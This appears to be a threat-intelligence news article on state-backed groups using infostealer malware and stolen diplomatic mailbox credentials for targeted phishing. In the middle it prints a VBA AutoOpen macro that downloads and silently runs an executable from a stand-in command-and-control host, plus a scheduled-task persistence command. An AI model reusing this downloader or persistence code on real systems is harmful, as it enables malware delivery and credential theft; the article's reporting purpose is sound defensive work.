Infostealer Malware is Being Exploited by APT Groups for Targeted Attacks

Cybersecurity

Infostealer malware, originally created to indiscriminately collect credentials from compromised systems, has been adapted for use by state-sponsored Advanced Persistent Threat (APT) groups.

Since early 2023, malware families like RedLine, Lumma, and StealC have spread through phishing campaigns and malicious downloads.

These infostealers typically extract browser data, cookies, and system information. Recent intelligence, however, shows that stolen credentials are now being used for targeted espionage activities.

The primary attack methods for infostealers include spear-phishing emails containing macro-enabled documents or fake software installers.

Victims often receive a Word attachment with a VBA macro that, once enabled, downloads the malicious payload from a command-and-control (C2) server.

Upon execution, the malware identifies and exfiltrates stored credentials for email, VPN, and corporate SSO portals.

Analysts have observed compromised diplomatic credentials from multiple Ministries of Foreign Affairs appearing in darknet exchanges, providing access to high-value targets.

Impact assessments reveal that when APT groups obtain valid diplomatic mailbox credentials—often via Infostealer infections—they can create spear-phishing campaigns that appear highly credible.

These campaigns effectively bypass traditional detection by using trusted sender reputations and valid TLS certificates.

By mid-2025, Hudson Rock’s threat intelligence platform identified over 1,400 compromised users at Qatar’s Ministry of Foreign Affairs, along with hundreds more in Saudi Arabia, South Korea, and the UAE, highlighting the global scope of this threat.

In a notable incident, a compromised Omani embassy account in Paris was used to send malicious invitations to UN officials. The email contained a Word document with a “sysProcUpdate” macro executing the following VBA code snippet:

Sub AutoOpen()
    Dim objXML As Object
    Set objXML = CreateObject("MSXML2.XMLHTTP")
    objXML.Open "GET", "https://malicious.c2.server/payload.exe", False
    objXML.Send
    If objXML.Status = 200 Then
        With CreateObject("ADODB.Stream")
            .Type = 1
            .Open
            .Write objXML.responseBody
            .SaveToFile Environ("TEMP") & "\update.exe", 2
        End With
        Shell Environ("TEMP") & "\update.exe", vbHide
    End If
End Sub

Following its delivery, the “update.exe” payload establishes persistence by creating a Windows Scheduled Task:

schtasks /Create /SC MINUTE /MO 15 /TN "SysProcUpdate" /TR "%TEMP%\update.exe"

Researchers have identified that this persistence mechanism ensures the malware executes repeatedly, even after system reboots, allowing long-term access.

Infection Mechanism

Infostealers exploit user trust and inadequate endpoint controls in their infection mechanisms.

Once initial compromise occurs via phishing, the payload uses common Windows APIs—such as CryptUnprotectData—to decrypt stored credentials from browsers and the Windows Credential Manager.

The exfiltration module then packages harvested data into encrypted blobs, transmitting them over HTTPS to evade intrusion detection systems.

Once credentials reach the attacker’s infrastructure, APT groups utilize them as legitimate logins, bypassing multi-factor authentication in cases where only user-password credentials are enforced.

By embedding the malware within routine-looking documents and mimicking legitimate maintenance tasks, infostealers maintain a low-and-slow profile, making detection exceptionally challenging.

This seamless exploitation of credential theft for targeted campaigns signifies a concerning evolution in cyber-espionage tactics.